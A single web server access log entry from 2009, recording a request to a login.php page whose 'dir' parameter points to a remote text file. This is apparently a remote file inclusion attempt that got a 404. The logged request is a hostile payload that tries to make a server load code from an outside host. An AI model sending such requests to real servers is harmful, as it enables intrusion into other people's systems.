67.227.134.140 - - [12/Nov/2009:05:52:04 -0600] "GET /logs/access_log.1250985600/skin/happycast_category_lightblack/login.php?dir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
